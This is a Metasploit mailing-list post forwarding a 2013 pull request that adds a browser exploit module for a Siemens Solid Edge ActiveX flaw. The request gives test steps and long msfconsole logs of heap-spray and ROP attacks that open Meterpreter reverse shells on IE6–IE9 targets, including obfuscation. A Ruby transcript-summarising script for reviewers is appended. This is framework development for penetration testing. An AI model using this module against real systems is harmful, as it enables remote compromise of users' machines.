
Metasploit mailing list archives
Fwd: [metasploit-framework] Add module for OSVDB 93696 (#2444)
From: Tod Beardsley <todb () metasploit com>
Date: Tue, 1 Oct 2013 12:12:50 -0500
Best exploit pull request ever. Description of, pointer to, and help offered with, vulnerable software installation, verification steps, and screens of alternative exploit scenarios in action. Thanks Juan! I'll want to work this into the documentation on "How to PR against Metasploit" some day soon.

---------- Forwarded message ----------
From: Juan Vazquez <notifications () github com>
Date: Tue, Oct 1, 2013 at 11:52 AM
Subject: [metasploit-framework] Add module for OSVDB 93696 (#2444)
To: rapid7/metasploit-framework <metasploit-framework () noreply github com>
From the original advisory the software can be located:

http://www.exploit-db.com/exploits/25712/

software description: http://en.wikipedia.org/wiki/Solid_Edge
vendor site: http://www.siemens.com/entry/cc/en/
download url: http://www.plm.automation.siemens.com/en_us/products/velocity/forms/solid-edge-student.cfm
file tested: SolidEdgeV104ENGLISH_32Bit.exe

Downloaded some time ago, don't know if the installer is still available. Email me if you need the installer and it isn't available on the vendor site anymore.

In order to test:

- Install as many combinations as you would like to test of Windows XP SP3, Vista, 7 SP1 / IE6-IE9 / SolidEdgeV104ENGLISH_32Bit.exe
- Verify versions of the targeted components: Jutil.dll 104.0.0.82 and SEListCtrlX 104.0.0.82
- Start msfconsole, select the module and run the exploit
- In the browser, go to the link provided by the module. It should provide a shell. It is using Heap Spray so expect some fails from time to time. But the module should be reliable enough.
- [ ] If you would like to verify javascript OBFUSCATION for the heap spray, "set OBFUSCATE true" on the msfconsole once the exploit has been selected, before exploit.

Testing examples (IE6 to IE9 on XP SP3 and 7 SP1):

*IE6 / Windows XP SP3*

msf exploit(siemens_solid_edge_selistctrlx) >
[*] 10.6.0.165 siemens_solid_edge_selistctrlx - Requesting: /56sraXTibJtdt
[*] 10.6.0.165 siemens_solid_edge_selistctrlx - Target selected as: IE 6 on Windows XP SP3
[*] 10.6.0.165 siemens_solid_edge_selistctrlx - Using payload without ROP...
[*] 10.6.0.165 siemens_solid_edge_selistctrlx - Sending HTML...
[*] Sending stage (770048 bytes) to 10.6.0.165
[*] Meterpreter session 1 opened (10.6.0.165:4444 -> 10.6.0.165:49707) at 2013-10-01 10:06:17 -0500
[*] Session ID 1 (10.6.0.165:4444 -> 10.6.0.165:49707) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: IEXPLORE.EXE (1692)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3564
[+] Successfully migrated to process

msf exploit(siemens_solid_edge_selistctrlx) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: JUAN-C0DE875735\Administrator
meterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 10.6.0.165 - Meterpreter session 1 closed. Reason: User exit

*IE 7 / Windows XP SP3*

msf exploit(siemens_solid_edge_selistctrlx) >
[*] 10.6.0.165 siemens_solid_edge_selistctrlx - Requesting: /56sraXTibJtdt
[*] 10.6.0.165 siemens_solid_edge_selistctrlx - Target selected as: IE 7 on Windows XP SP3
[*] 10.6.0.165 siemens_solid_edge_selistctrlx - Using payload without ROP...
[*] 10.6.0.165 siemens_solid_edge_selistctrlx - Sending HTML...
[*] Sending stage (770048 bytes) to 10.6.0.165
[*] Meterpreter session 3 opened (10.6.0.165:4444 -> 10.6.0.165:49921) at 2013-10-01 10:16:26 -0500
[*] Session ID 3 (10.6.0.165:4444 -> 10.6.0.165:49921) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (1056)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3664
[+] Successfully migrated to process

msf exploit(siemens_solid_edge_selistctrlx) > sessions -i 3
[*] Starting interaction with 3...

meterpreter > getuid
Server username: JUAN-C0DE875735\Administrator
meterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 10.6.0.165 - Meterpreter session 3 closed. Reason: User exit

- with obfuscation

msf exploit(siemens_solid_edge_selistctrlx) >
[*] 172.16.240.1 siemens_solid_edge_selistctrlx - Requesting: /581APDrO
[*] 172.16.240.1 siemens_solid_edge_selistctrlx - Target selected as: IE 7 on Windows XP SP3
[*] 172.16.240.1 siemens_solid_edge_selistctrlx - Using payload without ROP...
[*] 172.16.240.1 siemens_solid_edge_selistctrlx - Sending HTML...
[*] Sending stage (770048 bytes) to 172.16.240.1
[*] Meterpreter session 6 opened (172.16.240.1:4444 -> 172.16.240.1:50605) at 2013-10-01 11:40:20 -0500
[*] Session ID 6 (172.16.240.1:4444 -> 172.16.240.1:50605) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (1340)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2440
[+] Successfully migrated to process

*IE 8 / Windows XP SP3*

msf exploit(siemens_solid_edge_selistctrlx) >
[*] 10.6.0.165 siemens_solid_edge_selistctrlx - Requesting: /CyzchAko9Lj0
[*] 10.6.0.165 siemens_solid_edge_selistctrlx - Target selected as: IE 8 on Windows XP SP3
[*] 10.6.0.165 siemens_solid_edge_selistctrlx - Using msvcrt ROP
[*] 10.6.0.165 siemens_solid_edge_selistctrlx - Sending HTML...
[*] Sending stage (770048 bytes) to 10.6.0.165
[*] Meterpreter session 4 opened (10.6.0.165:4444 -> 10.6.0.165:50169) at 2013-10-01 10:56:24 -0500
[*] Session ID 4 (10.6.0.165:4444 -> 10.6.0.165:50169) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (2732)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 1764
[+] Successfully migrated to process

msf exploit(siemens_solid_edge_selistctrlx) > sessions -i 4
[*] Starting interaction with 4...

meterpreter > getuid
Server username: JUAN-C0DE875735\Administrator
meterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 10.6.0.165 - Meterpreter session 4 closed. Reason: User exit

- with obfuscation

msf exploit(siemens_solid_edge_selistctrlx) >
[*] 172.16.240.1 siemens_solid_edge_selistctrlx - Requesting: /581APDrO
[*] 172.16.240.1 siemens_solid_edge_selistctrlx - Target selected as: IE 8 on Windows XP SP3
[*] 172.16.240.1 siemens_solid_edge_selistctrlx - Using msvcrt ROP
[*] 172.16.240.1 siemens_solid_edge_selistctrlx - Sending HTML...
[*] Sending stage (770048 bytes) to 172.16.240.1
[*] Meterpreter session 5 opened (172.16.240.1:4444 -> 172.16.240.1:50596) at 2013-10-01 11:36:57 -0500
[*] Session ID 5 (172.16.240.1:4444 -> 172.16.240.1:50596) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (2960)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3400
[+] Successfully migrated to process

msf exploit(siemens_solid_edge_selistctrlx) > sessions -i 5
[*] Starting interaction with 5...

meterpreter > getuid
Server username: JUAN-C0DE875735\Administrator
meterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 172.16.240.1 - Meterpreter session 5 closed. Reason: User exit

*IE8 / Windows 7 SP1*

msf exploit(siemens_solid_edge_selistctrlx) >
[*] 10.6.0.165 siemens_solid_edge_selistctrlx - Requesting: /QGQFAoQKQPfO
[*] 10.6.0.165 siemens_solid_edge_selistctrlx - Target selected as: IE 8 on Windows 7
[*] 10.6.0.165 siemens_solid_edge_selistctrlx - Using JUtil ROP built dynamically...
[*] 10.6.0.165 siemens_solid_edge_selistctrlx - Sending HTML...
[*] Sending stage (770048 bytes) to 10.6.0.165
[*] Meterpreter session 1 opened (10.6.0.165:4444 -> 10.6.0.165:50519) at 2013-10-01 11:21:05 -0500
[*] Session ID 1 (10.6.0.165:4444 -> 10.6.0.165:50519) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (3888)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 1000
[+] Successfully migrated to process

msf exploit(siemens_solid_edge_selistctrlx) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: WIN-RNJ7NBRK9L7\Juan Vazquez
meterpreter > sysinfo
Computer        : WIN-RNJ7NBRK9L7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.172.140 - Meterpreter session 1 closed. Reason: User exit

- with obfuscation

msf exploit(siemens_solid_edge_selistctrlx) > set OBFUSCATE true
OBFUSCATE => true
msf exploit(siemens_solid_edge_selistctrlx) > rexploit
[*] Stopping existing job...
[*] Reloading module...
[*] Exploit running as background job.
[*] Started reverse handler on 10.6.0.165:4444
[*] Using URL: http://0.0.0.0:8080/Bqg4d70LeyFC
[*] Local IP: http://10.6.0.165:8080/Bqg4d70LeyFC
[*] Server started.
msf exploit(siemens_solid_edge_selistctrlx) >
[*] 10.6.0.165 siemens_solid_edge_selistctrlx - Requesting: /Bqg4d70LeyFC
[*] 10.6.0.165 siemens_solid_edge_selistctrlx - Target selected as: IE 8 on Windows 7
[*] 10.6.0.165 siemens_solid_edge_selistctrlx - Using JUtil ROP built dynamically...
[*] 10.6.0.165 siemens_solid_edge_selistctrlx - Sending HTML...
[*] Sending stage (770048 bytes) to 10.6.0.165
[*] Meterpreter session 2 opened (10.6.0.165:4444 -> 10.6.0.165:50583) at 2013-10-01 11:29:29 -0500
[*] Session ID 2 (10.6.0.165:4444 -> 10.6.0.165:50583) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (2416)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 156
[+] Successfully migrated to process

*IE9 / Windows 7 SP1*

msf exploit(siemens_solid_edge_selistctrlx) >
[*] 172.16.240.142 siemens_solid_edge_selistctrlx - Requesting: /y1qz89a
[*] 172.16.240.142 siemens_solid_edge_selistctrlx - Target selected as: IE 9 on Windows 7
[*] 172.16.240.142 siemens_solid_edge_selistctrlx - Using JUtil ROP built dynamically...
[*] 172.16.240.142 siemens_solid_edge_selistctrlx - Sending HTML...
[*] 172.16.240.142 siemens_solid_edge_selistctrlx - Requesting: /y1qz89a
[*] 172.16.240.142 siemens_solid_edge_selistctrlx - Target selected as: IE 9 on Windows 7
[*] 172.16.240.142 siemens_solid_edge_selistctrlx - Using JUtil ROP built dynamically...
[*] 172.16.240.142 siemens_solid_edge_selistctrlx - Sending HTML...
[*] Sending stage (770048 bytes) to 172.16.240.142
[*] Meterpreter session 3 opened (172.16.240.1:4444 -> 172.16.240.142:49159) at 2013-10-01 11:32:21 -0500
[*] Session ID 3 (172.16.240.1:4444 -> 172.16.240.142:49159) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (3200)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3700
[+] Successfully migrated to process

msf exploit(siemens_solid_edge_selistctrlx) > sessions -i 3
[*] Starting interaction with 3...

meterpreter > getuid
Server username: WIN-RNJ7NBRK9L7\Juan Vazquez
meterpreter > sysinfo
Computer        : WIN-RNJ7NBRK9L7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 172.16.240.142 - Meterpreter session 3 closed. Reason: User exit

- with obfuscation

msf exploit(siemens_solid_edge_selistctrlx) > set OBFUSCATE true
OBFUSCATE => true
msf exploit(siemens_solid_edge_selistctrlx) > rexploit
[*] Stopping existing job...
[*] Reloading module...
[*] Exploit running as background job.
[*] Started reverse handler on 172.16.240.1:4444
[*] Using URL: http://172.16.240.1:8080/581APDrO
[*] Server started.
msf exploit(siemens_solid_edge_selistctrlx) >
[*] 172.16.240.142 siemens_solid_edge_selistctrlx - Requesting: /581APDrO
[*] 172.16.240.142 siemens_solid_edge_selistctrlx - Target selected as: IE 9 on Windows 7
[*] 172.16.240.142 siemens_solid_edge_selistctrlx - Using JUtil ROP built dynamically...
[*] 172.16.240.142 siemens_solid_edge_selistctrlx - Sending HTML...
[*] 172.16.240.142 siemens_solid_edge_selistctrlx - Requesting: /581APDrO
[*] 172.16.240.142 siemens_solid_edge_selistctrlx - Target selected as: IE 9 on Windows 7
[*] 172.16.240.142 siemens_solid_edge_selistctrlx - Using JUtil ROP built dynamically...
[*] 172.16.240.142 siemens_solid_edge_selistctrlx - Sending HTML...
[*] Sending stage (770048 bytes) to 172.16.240.142
[*] Meterpreter session 4 opened (172.16.240.1:4444 -> 172.16.240.142:49162) at 2013-10-01 11:34:18 -0500
[*] Session ID 4 (172.16.240.1:4444 -> 172.16.240.142:49162) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (604)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3188
[+] Successfully migrated to process

------------------------------
You can merge this Pull Request by running

  git pull https://github.com/jvazquez-r7/metasploit-framework osvdb_93696

Or view, comment on, or merge it at:

  https://github.com/rapid7/metasploit-framework/pull/2444

Commit Summary
- Add module for OSVDB 93696

File Changes
- *A* modules/exploits/windows/browser/siemens_solid_edge_selistctrlx.rb <https://github.com/rapid7/metasploit-framework/pull/2444/files#diff-0> (500)

Patch Links:
- https://github.com/rapid7/metasploit-framework/pull/2444.patch
- https://github.com/rapid7/metasploit-framework/pull/2444.diff
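A reviewer working through a test report like the one above wants to know, per browser/OS target, which exploitation strategy the module chose, whether a session actually came back, and whether migration completed; the heap-spray caveat in the PR text means a missing session is expected now and then and should be visible rather than buried in the transcript. The script below is an added example, not code from the PR or from Metasploit. It parses the msfconsole line formats that appear in the transcripts ("Target selected as:", "Using ... ROP", "Meterpreter session N opened", "Successfully migrated to process") into one record per target selection. The module name string, the strategy labels and the sample log are assumptions for the example; the log is constructed, with RFC 5737 addresses, and includes the retried-request case seen in the IE 9 run and a run that never calls home.

```ruby
#!/usr/bin/env ruby
# Added example, not code from the PR or from Metasploit: summarise a pasted
# msfconsole transcript of a browser-exploit test run into one record per
# target selection, so a reviewer can check that every browser/OS combination
# claimed in a PR description produced a session and which strategy it used.
# MODULE_TAG, STRATEGIES and SAMPLE_LOG are assumptions made for this example.

MODULE_TAG = 'siemens_solid_edge_selistctrlx'.freeze

# Short labels for the module's "Using ..." messages (trailing dots stripped).
STRATEGIES = {
  'Using payload without ROP'         => :no_rop,
  'Using msvcrt ROP'                  => :msvcrt_rop,
  'Using JUtil ROP built dynamically' => :jutil_rop
}.freeze

Record = Struct.new(:client, :target, :strategy, :attempts, :session, :migrated)

# Constructed transcript (RFC 5737 addresses): one clean run, one run where the
# client re-requested the page before a session came back, one run with no session.
SAMPLE_LOG = <<~'LOG'
  [*] 192.0.2.10 siemens_solid_edge_selistctrlx - Requesting: /a1b2c3
  [*] 192.0.2.10 siemens_solid_edge_selistctrlx - Target selected as: IE 8 on Windows XP SP3
  [*] 192.0.2.10 siemens_solid_edge_selistctrlx - Using msvcrt ROP
  [*] 192.0.2.10 siemens_solid_edge_selistctrlx - Sending HTML...
  [*] Sending stage (770048 bytes) to 192.0.2.10
  [*] Meterpreter session 1 opened (192.0.2.1:4444 -> 192.0.2.10:49701) at 2013-10-01 10:56:24 -0500
  [*] Session ID 1 (192.0.2.1:4444 -> 192.0.2.10:49701) processing InitialAutoRunScript 'migrate -f'
  [+] Migrating to 1764
  [+] Successfully migrated to process
  [*] 192.0.2.20 siemens_solid_edge_selistctrlx - Target selected as: IE 9 on Windows 7
  [*] 192.0.2.20 siemens_solid_edge_selistctrlx - Using JUtil ROP built dynamically...
  [*] 192.0.2.20 siemens_solid_edge_selistctrlx - Sending HTML...
  [*] 192.0.2.20 siemens_solid_edge_selistctrlx - Target selected as: IE 9 on Windows 7
  [*] 192.0.2.20 siemens_solid_edge_selistctrlx - Using JUtil ROP built dynamically...
  [*] 192.0.2.20 siemens_solid_edge_selistctrlx - Sending HTML...
  [*] Meterpreter session 2 opened (192.0.2.1:4444 -> 192.0.2.20:49159) at 2013-10-01 11:32:21 -0500
  [+] Successfully migrated to process
  [*] 192.0.2.30 siemens_solid_edge_selistctrlx - Target selected as: IE 6 on Windows XP SP3
  [*] 192.0.2.30 siemens_solid_edge_selistctrlx - Using payload without ROP...
  [*] 192.0.2.30 siemens_solid_edge_selistctrlx - Sending HTML...
LOG

def parse_transcript(text)
  records = []
  text.each_line do |line|
    case line
    when /\[\*\] (\S+) #{MODULE_TAG} - Target selected as: (.+?)\s*$/
      client, target = $1, $2
      last = records.reverse.find { |r| r.client == client }
      if last && last.target == target && last.session.nil?
        # Same client, same target, no session yet: the browser re-requested
        # the page (as in the IE 9 run above), not a new test case.
        last.attempts += 1
      else
        records << Record.new(client, target, nil, 1, nil, false)
      end
    when /\[\*\] (\S+) #{MODULE_TAG} - (Using [^.\r\n]+)/
      client, message = $1, $2
      rec = records.reverse.find { |r| r.client == client }
      rec.strategy = STRATEGIES.fetch(message, :unknown) if rec
    when /Meterpreter session (\d+) opened \([\d.]+:\d+ -> ([\d.]+):\d+\)/
      sid, client = $1.to_i, $2
      rec = records.reverse.find { |r| r.client == client && r.session.nil? }
      rec.session = sid if rec
    when /\[\+\] Successfully migrated to process/
      # The migrate line carries no client address; it belongs to the most
      # recently opened session that has not been marked migrated yet.
      rec = records.reverse.find { |r| r.session && !r.migrated }
      rec.migrated = true if rec
    end
  end
  records
end

# Targets from the expected list that never produced a session.
def missing_sessions(records, expected_targets)
  expected_targets - records.select(&:session).map(&:target)
end

if __FILE__ == $PROGRAM_NAME
  records = parse_transcript(SAMPLE_LOG)
  records.each do |r|
    status = r.session ? "session #{r.session}#{r.migrated ? ', migrated' : ''}" : 'NO SESSION'
    puts format('%-24s %-11s attempts=%d %s', r.target, r.strategy, r.attempts, status)
  end
  puts "Missing: #{missing_sessions(records, ['IE 7 on Windows XP SP3']).inspect}"
end
```

Paste a real transcript in place of SAMPLE_LOG and pass the list of targets the PR claims to cover to missing_sessions; a target that shows up there is either a heap-spray miss worth re-running or a combination that was never tested.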
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework